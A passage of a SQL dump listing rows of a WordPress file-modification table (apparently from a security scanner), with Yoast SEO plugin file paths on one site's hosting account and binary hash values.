('bUND>¨kœÔËGÈ¸ ïW', 'wp-content/plugins/wordpress-seo/inc/class-post-type.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-post-type.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '±(Ñ]$@˜u3£H', 'FÒñÏS{O8j×SâžÉ‚j‹9?c1:=‘¶­x~', '', 0, '?'),
('\0”Â%Î¥J-šp¾É', 'wp-content/plugins/wordpress-seo/inc/class-rewrite.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-rewrite.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Î\nx‰[#ž×''U¡ÑšPÎ', '®é¯˜F"‘fäd)Ö€¹”ZÒvì}€,\nÑGC', '', 0, '?'),
('›LÃ½f ºñ8=µf¹B{', 'wp-content/plugins/wordpress-seo/inc/class-upgrade-history.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-upgrade-history.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '~:¥þâ³Í!~0–al‘', ')Ø \0ßsÐí •ã•t—±±‡(“Œq(–– ?…B\r/', '', 0, '?'),
('Q¹ƒ4“Ï%ÐôzÀ>*ÀñI', 'wp-content/plugins/wordpress-seo/inc/class-upgrade.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-upgrade.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ä(p%§5tôÀlIR¬mì', '4—ºOåè³%1gàÓ#ôè‘ Í-Ã,q¯±[ç¾1á—', '', 0, '?'),
('ê*œÂlw°-3Ü¸*)à', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-admin-bar-menu.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-admin-bar-menu.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ægzy²­ƒÑ³cÓäš', 'ÆÅ8b>Ü¦4e¢3Çû±¤ø°hýÛé«Byõ''', '', 0, '?'),
('ŒUDêÄž—;®ï(Ç¨l', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-content-images.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-content-images.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '†:‚äJ¼%k¨áC*4Lé', '›¥‚üÂ±É2µµ¿S%PûôCpKy£¢ÿÔësÌžZ;Ô', '', 0, '?'),
('œ\nr''žª±AZ}‰Â!ºd‚', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-fields.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-fields.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ')ëÏ;û»Iÿa{Æ¬üÁ', 'ÏézIºÞÙQZpR:ZÖ¡è¿Òim¹˜B€Ø»\r0›0', '', 0, '?'),
('PÆêJ1h«ß|À­ôˆrç', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-taxonomies.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-taxonomies.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'é´é4™ÿ3û…ÄýØ,Â', 'Uà0`Ê÷7(t°Ñâ­Y¨Ús®\\Ÿh¯tr(''Ý©1¤', '', 0, '?'),
('»Vá(^ -OÜ\ZT0ô{', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-image-utils.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-image-utils.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'bßOµ³;\\-¤Û3û)', 'x|‘¥CY¨5c“Ð:Ü¤iJ•r\\¥GÀcœW', '', 0, '?'),
('¿<\0$é°\rÖƒÉ''(OkÜ', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-installation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-installation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ìIÐsãµØÕ…†@D', '}8h%?Ã|äÛÛ|äB‰‚¥i4÷_\Z`î\r7(ÑmNK', '', 0, '?'),
('÷ÉBñH…Œ¥w¥…í', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-meta.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-meta.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'û:\Z+¾îrÇÏ½wôßå', '[ÿ ÙÝ%rd¸¾ƒIsT¶‘€ó½°¥³–ŠšY¶½', '', 0, '?'),
('ÁVXg!xOIùÃæï{áA', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-primary-term.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-primary-term.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Éõ%¥˜<D™À9… á', 'âíŠ%ëÕYõHä‘º¢tŽœO•+¹Ùhà \\¦¾0', '', 0, '?'),
('ÍÈyØUq§¬ê½hÅß', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-rank.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-rank.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'LD¾ÇS Øš¢múñ˜G:', 'ogú°S?ºJÀ(N¯üjˆöéæÊþ«Q¥Òs	†òY^', '', 0, '?'),
('XÍ®™Ñàxâ·™Ä#ˆÆ', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-replace-vars.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-replace-vars.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'õZ\Zõ…È«<jNÙ_	6', '	yLX’¢=-™šŽyA5äF\n:9$@\Z^\Z2r1‡lÒ', '', 0, '?'),
('goü@>3:ÛÕåh', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-replacement-variable.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-replacement-variable.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷õ>œª–³''%ÿbC¬¿', '|®.´#ŽäËfÈÕZÂZŒY	9Á°~ýöÿ\ZrËK', '', 0, '?'),
('ÐâŒÏ`¯~P¾0Nç6H', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-shortlinker.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-shortlinker.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ïax[T‡œghŒõÃ', 'Ó]\\·£Gv¶Kò¾®}£0ºýôñ¼CûÚ', '', 0, '?'),
('õÈ‰m–Ä×m„^mÙB#', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-statistics.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-statistics.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¤§õ¼e¹ ˜T#ŽW¸²', '÷×Ý¦–¤Ø„t9\Zb¡kÔ~poMlÈ\\;2ô7ÿQþ', '', 0, '?'),
('ÈàQ‰qá}Þ…›[\r‚å<', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-utils.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-utils.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ò\\QÑÁÿ½ºzôôàºG', 'œJ­¥1×þÜB38/[1­¡ò@˜"ØvëÁÓaZ‚¨u', '', 0, '?'),
('úœŸq×_•Æô†Ä¡–‹>', 'wp-content/plugins/wordpress-seo/inc/class-yoast-dynamic-rewrites.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-yoast-dynamic-rewrites.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™%®7ˆ‹ø‚©›­W·ð', 'gHn*O\Z¤Áeãîf<þu»×^™vf‰Vb–', '', 0, '?'),
('ŒñE_*:6`I„t†±š', 'wp-content/plugins/wordpress-seo/inc/date-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/date-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’TŠä’]üi k÷­4%{', 'MÈ:Úæ›CÖÔ–,0ÑÐ0“óÕæœ\\•|3ÙÒóö', '', 0, '?'),
('i(âô	Ç0t7„@âQú@', 'wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-bad-request-exception.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-bad-request-exception.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '$vš)W÷—œØ”¸E¶ï', 'Xþ•Š_<XÔKnm¹_ŒŸÝ&±‡K$E3S¶', '', 0, '?'),
('ßu¹’¥J•°ëŽ,Fqá', 'wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-invalid-json-exception.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-invalid-json-exception.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '{­±\0,µæ''û½ªgUÆ‰Õ', 'TtJøê5i>xªuüáHþæf{ú|ÌkGõ±X', '', 0, '?'),
('$¼æPÿâåXuûœÐäÙ', 'wp-content/plugins/wordpress-seo/inc/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'EÐ›´‹O0‹cº«Ag3', 'ÍÍ	èš {‘c¼FJÃw±¦!}aŸ˜ü9', '', 0, '?'),
('ð‘Éóò€é3ÿŒ:À´^c', 'wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-ajax-integration.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-ajax-integration.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'dPüXÂ¥Å×ûn…ç$Æ', 'dMõøàksqœÖ4¿þÊÍçRý^2ø~B"K’', '', 0, '?'),
('ƒ›oVu‚4ÃÇ×;fžâ', 'wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-integration.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-integration.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'dÇÑö…‹uIÌÖ(™ØY†', 'ô\\Ouèip''(y]¹÷	€ú½+ª\nZ›ÞÞ<}œ¹', '', 0, '?'),
('hiùFÇ·ÉµxÑÀí½N´', 'wp-content/plugins/wordpress-seo/inc/language-utils.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/language-utils.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '$ów…&¿¡Ä¹Û²~Ò…', '¾Ïò\Z¤âÁÎSˆžþ7é\nâî	Õ\noò±*}Ö“­', '', 0, '?'),
('ÊÛ¨V¤ö<Ðð;áø‚@P', 'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-ms.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-ms.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'FšHnÙ+XÉb§lÖ÷“\r', 'PÝõéEÑyêbL¨Õ®Áˆ&&¡@NMNÛ­8', '', 0, '?'),
('|Ésªküíž[øcƒûõÐ™', 'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-social.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-social.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÍºÝlnÇ2ç\ZôaSx“', '~c8„½x:îÚsU¦äçJ1[''°9Áa=´ä$ç', '', 0, '?'),
('y†•ˆ´»®ÛöR?kZB†', 'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-titles.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-titles.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'uä¹¦OôcÑäU&2äZ›', 'Éß¥?P²Õ¥KŒo+O!ÛP¶ÿ$U ×¶×I‡@VÐ', '', 0, '?'),
('[~6Ë€Mp¢''Œ©q', 'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-wpseo.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-wpseo.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1ß¶û¯}ÝºæãÓ', '>»1§âöVTáð!å±A=ƒßw/-ØÆºÑ‘í<Õô¬x§', '', 0, '?'),
('A"~ÛŒ5)‚¢N×WÓn', 'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '8ä ·SßÝ¹cœÔ®å''´', 'bhý¾adÉø¡…:×ªþË…_ˆà&ÚöÉAæ´Ø', '', 0, '?'),
('5–™0äJŠ¢@(\0`M', 'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-options.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/options/class-wpseo-options.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'îNáÓl+ÜS¨!ƒÿš„C', '¡—älóX_¯hCk²}¯…tªXnˆþÆš—	', '', 0, '?'),
('CÅ"ö@ì7ätö', 'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-taxonomy-meta.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/options/class-wpseo-taxonomy-meta.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"F´W–@8§ªä÷-&u', 'r‹þÜŒnÂ	‚È¼Ó7Ü	5&b]`øF»j8Õþµä;', '', 0, '?'),
('¡©ì6B˜b—³M¶ü', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-author-sitemap-provider.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-author-sitemap-provider.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Š»9™ƒž#¿-Ü,÷ý', '?$Én¨Œ‹H_§\\U—Ež?Ç¦•E|°½˜ëÜšÆ', '', 0, '?'),
('#4 °iGv»u+BÑí”.', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-post-type-sitemap-provider.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-post-type-sitemap-provider.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\0j2‰ÐäÑ·,¶«Gí¸­', ' ¢\Zˆz†þS?V²Z%¾Š±@Ô¤³ˆ¿½Ò‰[&«', '', 0, '?'),
('¶=vÙ"¿!1ÌpÙÐ', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-cache-data.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-cache-data.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'TÖ¤Nç68•ÈªZº.0®', '«ûdáÚVŠžº•Å·N=Öî>ºSæÚ£j¼UM›', '', 0, '?'),
('¨‚¦³üÊŠnáó­úôZ', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-image-parser.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-image-parser.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Õ%.öùEÐl„Ì•Ú©æ(', '×;Ê¼|ßJwæ#Gÿ<Œˆº&‡\0úë‰;&ñj', '', 0, '?'),
('}<³Å}#*%ÓV>çÙÉ–', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-admin.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-admin.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÜÚêÄ¡ß˜ÎTÖZ4BBÆS', '&Â.Xt=cû€®§týÿ©APOB[ÍáƒDüêF3', '', 0, '?'),
('ìßÃ.ãµ“~ÑXÿÑ¹7Ò', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache-validator.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache-validator.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'pq÷''^\ræYýR*¨FÊû', '²#ëOÒØq°Òi3ôÉB“ÈQµ™ñøQàdÌ(÷', '', 0, '?'),
('2ZÍv³—p$x@VÃ', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'kÉçèñ ás&˜=—Lâ¦', 'ŸËž²2re—#·•x·åh\0>šîõúÄË¯^hÛ6', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('Ö	›à‡Œ†AR©Z\Zêé', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-renderer.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-renderer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÊSˆÜ¨¬`‡üV', ')Âl¹{¤''ÛC¬Q_ì:ØˆxYÿÀ—òê', '', 0, '?'),
('A2GD¡¸ Ì‡w^‹^\Z{Ê', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-router.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-router.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '^ÂÎ‚2_îNDc_Ø', 'døB£ uïº’Aî\\6\ZB{ØÑ¿É7ÉŒá{™', '', 0, '?'),
('ºûù‰VFN	Ø€#{¶', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '2†@ot\0~„·r…8Í', 'i6ÓajÑ~v³<ªb@Ø]‡\rSt²ƒè¿°è ', '', 0, '?'),
('ÐÂçÄ/ðEmSñíþ~ô', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-taxonomy-sitemap-provider.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-taxonomy-sitemap-provider.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÙhÙu\ZN®_0XÌ', '`${(?6Æme¹xd''¼Â©ÓáPÔ™ÍjnÚ˜W', '', 0, '?'),
('ˆ—#Êdl|Mì™SRÉ™', 'wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-cache-data.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-cache-data.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'óð˜†ûúrY¸-¸‘', 'ºäàÜüS¿¯àñß	¡{o°5ßƒÀV‘z-…¬', '', 0, '?'),
('''6±”Ñ¨Ÿ¸ý„p ã»ä', 'wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-provider.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-provider.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'hûeÿGtsÅ¾ÌÒ×ñ]', '%JÀ\r%<Ê Ù­fÑe!^n''‡Í¸’^—´6ÚB×', '', 0, '?'),
(' ë¥}BË[ô^ŠcQÈ\n;w', 'wp-content/plugins/wordpress-seo/inc/wpseo-functions-deprecated.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/wpseo-functions-deprecated.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ôîÒ…±:j‚)È¨æABÄ×', 'Ôÿw''lOiS7l68Kë9sä7n7 ¤\0+²;+õ', '', 0, '?'),
('z•öDð·> ËA”)¬a', 'wp-content/plugins/wordpress-seo/inc/wpseo-functions.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/wpseo-functions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Í›Üå¾Ñá¦­·@"\r{¼', 'ö¾ÍpŽ“_ŒpÂ-EGuÀr7Ö«…NBmÄ÷–¬Âð±', '', 0, '?'),
('Æ¼…¹íÒ~9Œç~ç±Œ÷', 'wp-content/plugins/wordpress-seo/inc/wpseo-non-ajax-functions.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/wpseo-non-ajax-functions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '©“rãÉ@gž±‡', 'vG>YV ^œ¨Y?;MÂ`¿@°QÆ‚ÔÚ0ŒWë"', '', 0, '?'),
('uapF±‹[t#Œ€(q[', 'wp-content/plugins/wordpress-seo/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'EÐ›´‹O0‹cº«Ag3', 'ÍÍ	èš {‘c¼FJÃw±¦!}aŸ˜ü9', '', 0, '?'),
('é>(Wc“8Ý6¸(Cå', 'wp-content/plugins/wordpress-seo/js/dist/576.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/576.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'õÍ{6±*ÌÚ2o”ŠQ˜í', 'íütÝZªÆ×$®©…hîÁgÌôyTÇëmì¯kÇe', '', 0, '?'),
('ŠV‡Wàb©(a.‡²<›', 'wp-content/plugins/wordpress-seo/js/dist/academy.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/academy.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'dG;Ó%È£õ”¡S¤¬', '»{|Ä¢/ƒ	G€‰K*Ûs5þnÃÁÝ5A0ÎÐ5k', '', 0, '?'),
('Þ¨¢z+BÁC´‚á-šœ', 'wp-content/plugins/wordpress-seo/js/dist/addon-installation.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/addon-installation.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '	ØÊcÂáñWœ>e»…z', 'YÔO1±n_cÄt,ž¤öÕ¾Ú]¯_ÖÆózÆ·s¸', '', 0, '?'),
('—‚ø5WÔÓkÝ^ü.Ñ', 'wp-content/plugins/wordpress-seo/js/dist/admin-global.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/admin-global.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'øƒxXF4¤”T­$h’$à]', '~TÐ™Á$¾/6¥ºG-\0HÆ†\0Þõðâ¦Ÿfz4ä6®''', '', 0, '?'),
('©nýjÄþÜ™hÁr.l¿\0', 'wp-content/plugins/wordpress-seo/js/dist/admin-modules.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/admin-modules.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'E¬Æ“SdŠ!ú£H\\s	e', 'ú&ä>–à#š·ž,öœ1»[á‚º"1x‰fuS¡ Zk', '', 0, '?'),
('›g¹V»Sf´ôÉRx', 'wp-content/plugins/wordpress-seo/js/dist/analysis-worker.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/analysis-worker.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'êÖüØ™ÿM?ô+çuˆÓ', 'éÇø—ÜT£† MúâÇ®r¥(Â#Bc<_âZ§loÉ™È', '', 0, '?'),
('Á0¹<¶0ß\n·q	ò', 'wp-content/plugins/wordpress-seo/js/dist/api-client.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/api-client.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™”CÓOöi¾Îä¼ýN0Ú', '|û@y6}˜·áµæ\0„†“ú¬90d‚õ®\\C', '', 0, '?'),
('‚möi\ZtµTÈË(_µ\rpä', 'wp-content/plugins/wordpress-seo/js/dist/block-editor.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/block-editor.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Û[i_Œqê!oÔ,ŠmÕ-', 'ýØ»ç.å‚óÍµŸ³ÞSIÍõÔve ¢¬ú@', '', 0, '?'),
('žLuö¼Ðw?“²Ùq9', 'wp-content/plugins/wordpress-seo/js/dist/bulk-editor.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/bulk-editor.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'fÙ ‹|''¤Zóu(', 'd\\®t°Ú"roËÔE=GËüãÄÅ*ÜÕ™²]xÅO', '', 0, '?'),
('lD¿#S’âSxrô†', 'wp-content/plugins/wordpress-seo/js/dist/classic-editor.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/classic-editor.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¼«2''ÌP-4ÊÝCY', 'bTØëà]	Œf)KòO_†<öAzåÉÁ÷5¬—', '', 0, '?'),
('€Ùpb«¸™¾¥Â›Ü—', 'wp-content/plugins/wordpress-seo/js/dist/crawl-settings.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/crawl-settings.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'E3ÎbH˜Wu•†Ü´ÇPÑ', 'jó9èÔçfˆp*íƒµ†prOrñû¿$	ŸÅõ', '', 0, '?'),
('‚lûæÃ;Æî¬$¬Â	\nÕõ', 'wp-content/plugins/wordpress-seo/js/dist/dashboard-widget.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/dashboard-widget.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ô\r\\gVÒÚ€Ú„³n–àû', 'µhsõÃ|“¿é’÷Ý£G`4ërÕ„mcÑ ¼', '', 0, '?'),
('JRŽcÍTÔ5$hÏM', 'wp-content/plugins/wordpress-seo/js/dist/dynamic-blocks.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/dynamic-blocks.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ä&®¾ºþ¥|Òí¾²[ÿb¾', 'ðñuiE(ùÆ«ƒÓ-Þ~0`&^`<‚dÒgú^ê¿Ñ58', '', 0, '?'),
('®VÖç>›ÁýL1Ò•c¢0', 'wp-content/plugins/wordpress-seo/js/dist/edit-page.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/edit-page.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'h<SüÅ]iÁ‡õžïx˜', 'Mà°Îÿœ8ª%‘ùÖûA¡¬©ƒÌ(ŽDZ¹$Û', '', 0, '?'),
('¶jâeL=\Z”s‚4ók´+', 'wp-content/plugins/wordpress-seo/js/dist/editor-modules.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/editor-modules.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶.ÿ¶ÿÔÌÙÜS^úI¶±', '2ö’$‡ñ×;]ãž<ëNYŸçññˆ]ÈY+þ', '', 0, '?'),
('®Ixå¹_WñË^8ú×H', 'wp-content/plugins/wordpress-seo/js/dist/elementor.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/elementor.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'kYûŒ6å‘&›ø¬»CB–', 'Ôò$eƒAÕ*áÄÎ‹Œ,NnxR\0,\nï3ÀÏÉéª7–', '', 0, '?'),
